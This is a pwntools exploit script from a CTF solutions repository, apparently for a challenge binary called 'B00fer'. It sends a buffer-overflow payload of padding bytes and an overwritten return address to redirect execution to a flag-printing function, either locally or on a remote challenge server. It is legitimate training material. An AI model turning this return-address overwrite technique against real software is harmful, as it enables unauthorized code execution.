furtest
34634f73c1
Add CTFs from 2024 to the content, htb apocalypse, spookyCTF, buckeye ctf and some edits to the 404 ctf
50 lines
1.4 KiB
Python
Executable File
50 lines
1.4 KiB
Python
Executable File
#!/usr/bin/python3
|
|
from pwn import *
|
|
|
|
# Allows you to switch between local/GDB/remote from terminal
|
|
def start(argv=[], *a, **kw):
|
|
if args.GDB: # Set GDBscript below
|
|
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
|
|
elif args.REMOTE: # ('server', 'port')
|
|
return remote(sys.argv[1], sys.argv[2], *a, **kw)
|
|
elif args.SSH:
|
|
exe = remote_exe
|
|
s=ssh(host='HOST',user='LOGIN',password='PASSWORD',port=0000)
|
|
return s.process([exe] + argv)
|
|
else: # Run locally
|
|
exe = local_exe
|
|
return process([exe] + argv, *a, **kw)
|
|
|
|
|
|
# Specify your GDB script here for debugging
|
|
gdbscript = '''
|
|
'''.format(**locals())
|
|
|
|
|
|
# Set up pwntools for the correct architecture
|
|
local_exe = 'B00fer'
|
|
remote_exe = 'REMOTE'
|
|
# This will automatically get context arch, bits, os etc
|
|
elf = context.binary = ELF(local_exe, checksec=False)
|
|
# Change logging level to help with debugging (error/warning/info/debug)
|
|
#context.log_level = 'debug'
|
|
context.log_level = 'error'
|
|
|
|
# ===========================================================
|
|
# EXPLOIT GOES HERE
|
|
# ===========================================================
|
|
|
|
payload = flat(
|
|
b'\x00'*5*8,
|
|
p64(0x401227)
|
|
)
|
|
|
|
write("payload", payload)
|
|
|
|
io = start()
|
|
|
|
io.sendlineafter(b'Hi there NICC! This program is 100% and there is NO WAY you are getting our flag.\n', payload)
|
|
|
|
io.recvline().decode()
|
|
print(io.recvline().decode())
|